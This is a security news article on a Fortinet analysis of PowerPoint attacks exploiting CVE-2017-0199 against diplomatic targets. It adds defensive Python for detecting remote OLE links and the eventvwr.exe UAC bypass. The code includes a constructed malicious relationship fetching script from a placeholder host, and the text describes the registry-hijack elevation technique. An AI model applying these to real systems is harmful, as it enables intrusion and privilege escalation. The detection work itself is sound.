Fortinet security researchers warn that attackers are using malicious PowerPoint files that exploit a recently patched Microsoft Office vulnerability to target foreign ministries, international organizations, UN agencies, and entities that interact with international governments.
The attackers use a file named ADVANCED DIPLOMATIC PROTOCOL AND ETIQUETTE SUMMIT.ppsx that exploits CVE-2017-0199, a flaw in the way Office handles remotely linked OLE objects, which Microsoft patched in April. Around the time of the patch, cyber criminals were already abusing CVE-2017-0199 to deliver various types of malware, including Dridex, Latentbot, Godzilla, and WingBird, and the exploit remains in active use despite the fix.
The first PowerPoint-based attacks exploiting CVE-2017-0199 for malware delivery were recorded a month earlier; they distributed a Trojanized build of REMCOS, a legitimate, customizable remote access tool (RAT).
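As an added example (not code from Fortinet's analysis), the following Python checks a PowerPoint package for the tell-tale sign of a CVE-2017-0199 document: an OLE object relationship whose target lies outside the package (a remote URL or a script: moniker) instead of an embedded part. The sample packages, the placeholder address and the relationship IDs are constructed for the example and are not the contents of the analyzed file.

```python
"""Triage a PowerPoint package for the externally-linked OLE object that
CVE-2017-0199-style documents rely on.  Added example, not Fortinet's code
and not derived from the analyzed file; the sample packages are constructed.

A .ppsx/.pptx is a ZIP of XML parts, and each part's links are declared in a
*.rels file.  A benign embedded object lives inside the package; an exploit
document instead declares an oleObject relationship whose Target is an
external moniker that Office resolves and hands to a handler when the slide
is rendered.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
HYPERLINK_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                      "relationships/hyperlink")
# Target schemes that pull a remote resource or invoke a script handler
REMOTE_SCHEME = re.compile(r"^(?:script|https?|ftp|file|mhtml):", re.IGNORECASE)


def external_ole_links(package_bytes):
    """Return every oleObject relationship that points outside the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                target = rel.get("Target", "")
                is_ole = rel.get("Type") == OLE_REL_TYPE
                external = (rel.get("TargetMode", "").lower() == "external"
                            or REMOTE_SCHEME.match(target) is not None)
                if is_ole and external:
                    scheme = target.split(":", 1)[0].lower() if ":" in target else ""
                    findings.append({"part": name, "id": rel.get("Id"),
                                     "target": target, "scheme": scheme})
    return findings


def build_sample(slide_rels_xml):
    """Constructed minimal PowerPoint package: only the parts the check walks."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0" encoding="UTF-8"?>'
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("ppt/slides/slide1.xml",
                    '<p:sld xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"/>')
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", slide_rels_xml)
    return buf.getvalue()


# Constructed relationship parts; 203.0.113.10 is a documentation address.
MALICIOUS_RELS = (
    f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{RELS_NS}">'
    f'<Relationship Id="rId2" Type="{OLE_REL_TYPE}" '
    f'Target="script:http://203.0.113.10/logo.doc" TargetMode="External"/>'
    f'</Relationships>'
)
# Benign: the OLE object is an embedded part; the only external link is a
# plain hyperlink, which is not the CVE-2017-0199 vector and is not flagged.
BENIGN_RELS = (
    f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{RELS_NS}">'
    f'<Relationship Id="rId2" Type="{OLE_REL_TYPE}" Target="../embeddings/oleObject1.bin"/>'
    f'<Relationship Id="rId3" Type="{HYPERLINK_REL_TYPE}" '
    f'Target="https://example.org/agenda" TargetMode="External"/>'
    f'</Relationships>'
)

if __name__ == "__main__":
    for label, rels in (("malicious", MALICIOUS_RELS), ("benign", BENIGN_RELS)):
        print(label, external_ole_links(build_sample(rels)))
```

Run `external_ole_links` over the raw bytes of a suspicious .ppsx before anyone opens it: any hit is grounds for detonation in a sandbox, not for a manual look, because Office resolves the moniker as soon as the slide renders.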
The exploit chain also bypasses User Account Control: the script it runs plants a command under the per-user registry key HKCU\Software\Classes\mscfile\shell\open\command and then launches eventvwr.exe, an auto-elevating Windows binary that honours that per-user handler, so the planted command runs with high integrity and no consent prompt. The technique was first publicly detailed about a year earlier.
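As an added example, not Fortinet's code, here is detection logic for that bypass run over a few constructed, simplified Sysmon-style events (registry value set, ID 13, and process create, ID 1). It flags a per-user write to the mscfile open handler followed within a short window by an eventvwr.exe launch by the same user. The key=value rendering, the user names, the SID and the paths are all constructed placeholders.

```python
r"""Detect the eventvwr.exe UAC bypass described above.  Added example, not
Fortinet's code.  Input is a constructed, simplified key=value rendering of
Sysmon events (ID 13 = registry value set, ID 1 = process create); users,
SID and paths are placeholders.

The bypass writes a command to HKCU\Software\Classes\mscfile\shell\open\command
(Sysmon logs HKCU as HKU\<SID>\...) and then starts eventvwr.exe, an
auto-elevating binary that consults that per-user handler, so the planted
command runs at high integrity with no consent prompt.  That per-user key does
not exist by default, so the write alone is a strong signal; pairing it with
the eventvwr.exe launch confirms the chain.
"""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

MSCFILE_HANDLER = re.compile(
    r"\\software\\classes\\mscfile\\shell\\open\\command$", re.IGNORECASE)
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line):
    """Parse 'key=value key="quoted value"' into a dict."""
    return {k: (q if q else b) for k, q, b in KV.findall(line)}


def mscfile_handler_writes(lines):
    """Every registry value set that targets the per-user mscfile open handler."""
    return [ev for ev in map(parse_event, lines)
            if ev.get("id") == "13" and MSCFILE_HANDLER.search(ev.get("target", ""))]


def detect_eventvwr_bypass(lines, window_s=300):
    """One alert per eventvwr.exe launch preceded, within window_s seconds,
    by a mscfile handler write from the same user."""
    events = sorted(map(parse_event, lines), key=lambda e: int(e["ts"]))
    handler_writes = defaultdict(list)   # user -> [(ts, writer image, planted command)]
    alerts = []
    for ev in events:
        ts, user = int(ev["ts"]), ev.get("user", "")
        if ev.get("id") == "13" and MSCFILE_HANDLER.search(ev.get("target", "")):
            handler_writes[user].append((ts, ev.get("image", ""), ev.get("details", "")))
        elif (ev.get("id") == "1"
              and PureWindowsPath(ev.get("image", "")).name.lower() == "eventvwr.exe"):
            recent = [w for w in handler_writes[user] if 0 <= ts - w[0] <= window_s]
            if recent:
                wts, writer, cmd = recent[-1]
                alerts.append({"user": user, "ts": ts, "handler_written_at": wts,
                               "writer": writer, "planted_command": cmd})
    return alerts


# Constructed events.  alice: a script sets the handler, then runs eventvwr.exe
# (the bypass).  bob: an administrator opens Event Viewer from Explorer (benign).
SAMPLE_EVENTS = [
    r'ts=1000 id=1 user=CORP\alice image="C:\Windows\System32\wscript.exe" '
    r'cmdline="wscript.exe C:\Users\alice\AppData\Local\Temp\a.js"',
    r'ts=1001 id=13 user=CORP\alice image="C:\Windows\System32\wscript.exe" '
    r'target="HKU\S-1-5-21-1-2-3-1001\Software\Classes\mscfile\shell\open\command" '
    r'details="C:\Users\alice\AppData\Roaming\upd.exe"',
    r'ts=1003 id=1 user=CORP\alice image="C:\Windows\System32\eventvwr.exe" '
    r'parent="C:\Windows\System32\wscript.exe"',
    r'ts=2000 id=1 user=CORP\bob image="C:\Windows\System32\eventvwr.exe" '
    r'parent="C:\Windows\explorer.exe"',
]

if __name__ == "__main__":
    for alert in detect_eventvwr_bypass(SAMPLE_EVENTS):
        print(alert)
```

The correlation window keeps an ordinary Event Viewer launch from alerting; the handler write itself is worth a separate, lower-volume alert, and on a live host the same check is a query for the existence of that key under HKCU for every user profile.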
The script also checks whether it is running in a virtual environment. If it finds no sign of a virtual machine, it proceeds to send data about the host to a remote server.
The researchers note that although the command and control (C&C) server had already been taken down by the time of their analysis, the script's code shows that whatever the C&C returns is passed straight to eval() and executed as arbitrary code. After running those commands, the script sends a notification back to the server.
“These commands can possibly be download functions to deliver the final payload, and the most commonly used malware for espionage are RATs (Remote Access Trojans),” Fortinet experts say.